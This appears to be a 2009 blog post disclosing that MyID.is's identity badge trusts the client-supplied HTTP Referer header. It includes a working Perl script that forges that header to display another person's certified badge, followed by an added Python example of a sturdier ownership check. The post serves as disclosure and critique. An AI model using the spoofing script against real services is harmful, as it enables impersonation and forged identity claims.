MyID.is FAIL
2009/03/27 filed under /web

Today I came across MyID.is, a new webservice that claims to be a Digital Identity Certification Platform.
That sounds fun! I find certification interesting, so a fancy website using X.509 or something cooler? Wow. But nope. It's not that cool and probably not worth spending time on.
I found it hard to work out exactly what it was they offered. I mean, what does this really tell you?
MyID.is is a Digital Identity certification platform. People use MyID.is to certify their digital identity, certify any content that they publish over the Internet, such as blog, website, comments, photos, videos, social network profiles, and in general to manage their digital life.
Are we going to put signatures on everything, using a PGP like system? (By the way, this is all there is in their FAQ)
The blog has a little more information. Basically, they want to know your full name and credit card number (alarm bells should go off here) in order for you to post your own "certified badge" on your website.
Since they trust the HTTP_REFERER header for this, it's insecure as heck.
Oh well, from now on, I am Charles.Nouyrit, really, look at this badge!
Sure, it doesn't link to their website, but it does show the correct timestamp and all. With a little trickery/phishing, I'm sure you can even forge the page it should link to.
The trick here is to provide your own HTTP_REFERER header, like this perl script does:
#!/usr/bin/perl
# CGI script that fetches the MyID.is badge while presenting a chosen Referer
# header, which is the only thing the badge server checks.
use strict;
use warnings;
use LWP::UserAgent;
my $ua = LWP::UserAgent->new();
# Referer is client-supplied; the server cannot tell this from a real embed.
$ua->default_header( 'Referer' => 'http://blog.myid.is/');
my $resp = $ua->get('http://devbadge.myid.is/?k=d9b6ddf2-b6be-4cfe'.
'-a562-aef151f903c8&w=200&c=http://blog.myid.is/');
# Pass the PNG straight through to the browser.
binmode STDOUT;
print "Content-type: image/png\n\n", $resp->content;
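Added here as an illustration, not code from the post or from MyID.is: the Referer-trusting check the post describes, beside an ownership check the issuer could have used instead, where the site owner publishes an issuer-minted token on the claimed site and the issuer fetches it. The key, secret, registry and well-known path are all constructed assumptions.

```python
import hmac
import hashlib
from urllib.parse import urlsplit

# Constructed demo data (assumptions, not MyID.is values): the issuer's secret
# and a registry mapping a badge key to the site its owner claims.
ISSUER_SECRET = b"constructed-demo-secret"
REGISTRY = {"demo-key-1": "blog.myid.is"}
# Hypothetical path at which a site owner would publish the proof token.
WELL_KNOWN_PATH = "/.well-known/myid-verify"


def badge_allowed_weak(key, headers):
    """The check the post describes: serve the badge if Referer names the site.
    Referer is chosen by the client, so the Perl script above passes it."""
    site = REGISTRY.get(key)
    referer_host = urlsplit(headers.get("Referer", "")).hostname
    return site is not None and referer_host == site


def ownership_token(key, site):
    """Issuer-side HMAC binding the badge key to the site; only the issuer mints it."""
    msg = f"{key}|{site}".encode()
    return hmac.new(ISSUER_SECRET, msg, hashlib.sha256).hexdigest()


def verify_ownership(key, fetch):
    """Hardened alternative: the owner must publish the token on the claimed site.
    fetch(url) -> str stands in for the issuer's own HTTP GET (injected so this
    runs offline); the requester sends nothing the issuer has to believe."""
    site = REGISTRY.get(key)
    if site is None:
        return False
    try:
        published = fetch(f"https://{site}{WELL_KNOWN_PATH}").strip()
    except Exception:
        return False  # unreachable site or no token: not verified
    return hmac.compare_digest(published.encode(), ownership_token(key, site).encode())


def demo():
    """A forged Referer passes the weak check but not the ownership check."""
    forged = {"Referer": "http://blog.myid.is/"}  # what the Perl script sends
    token = ownership_token("demo-key-1", "blog.myid.is")
    owner_site = lambda url: token + "\n"  # the real owner published the token
    impostor_site = lambda url: "404 Not Found"  # cannot write to blog.myid.is
    return {"weak_forged": badge_allowed_weak("demo-key-1", forged),
            "strong_owner": verify_ownership("demo-key-1", owner_site),
            "strong_impostor": verify_ownership("demo-key-1", impostor_site)}
```

Proving control of a hostname still says nothing about who the person behind it is, which is the trust-in-MyID.is problem the post ends on.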
This system is far from perfect and completely useless, IMHO. After all, you still need to trust MyID.is, something I don't do at this stage.